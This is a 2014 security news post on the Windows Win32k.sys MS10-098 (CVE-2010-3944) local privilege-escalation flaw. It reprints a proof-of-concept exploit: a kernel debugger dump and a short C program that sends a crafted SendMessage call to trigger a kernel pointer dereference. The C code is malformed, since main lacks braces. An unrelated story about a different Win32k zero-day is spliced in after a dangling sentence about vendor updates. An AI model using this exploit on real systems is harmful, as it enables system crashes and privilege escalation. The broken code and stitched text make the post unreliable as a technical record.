April 20, 2014

Microsoft Windows Win32k.sys Local Privilege Escalation Vulnerability

Security researcher at SYSDREAM has discovered a local privilege-escalation vulnerability in Microsoft Windows that occurs in the ‘Win32k.sys’ Windows kernel-mode driver.

An attacker can exploit this vulnerability locally by executing arbitrary code with kernel-level privileges. With reference to SecurityFocus.com, the successful exploits will result in the complete compromise of affected computers and failed exploit attempts may cause a denial-of-service condition.

Exploit Code:

* MS10-098
* CVE-2010-3944
* Microsoft Windows Win32k pointer dereferencement
* --------------------
* Affected Software
* ------------------------
* Microsoft Windows 7 / 2008
* --------------------
* Consequences
* -----------------------
* An unprivileged user may be able to cause a bugcheck, or possibly execute
* arbitrary code by CSRSS.EXE.
* Credits : Stefan LE BERRE (s.leberre@sysdream.com)
*           Ludo t0ka7a
* WebSites : http://www.sysdream.com/
*            http://ghostsinthestack.org/
*            http://infond.blogspot.com/
*            http://twitter.com/hackinparis
* kd> r
* eax=00013370 ebx=0000000d ecx=00000000 edx=fea0069c esi=fea00618 edi=fea00618
* eip=8d72af90 esp=95b54a98 ebp=95b54b00 iopl=0         nv up ei ng nz na pe nc
* cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010286
* win32k!xxxRealDefWindowProc+0xf6:
* 8d72af90 c60000          mov     byte ptr [eax],0           ds:0023:00013370=??

#include <stdio.h>
#include <windows.h>
#include <Winuser.h>

int main(int argc, char *argv[])
    SendMessage((HWND) 16,(UINT) 13,0x80000000,0x00013370); // 0x13370 is the deref and 16 is the window handle of #32769
    return 0;

The vendor has released an advisory and updates:

Another zero-day vulnerability in the Windows kernel

Prevx is reporting that an exploit for a previously unknown security vulnerability in Windows’ win32k.sys kernel mode driver has been published on a Chinese forum. The vulnerability allows attackers who have penetrated a system to escalate their privileges.

Read the full story here.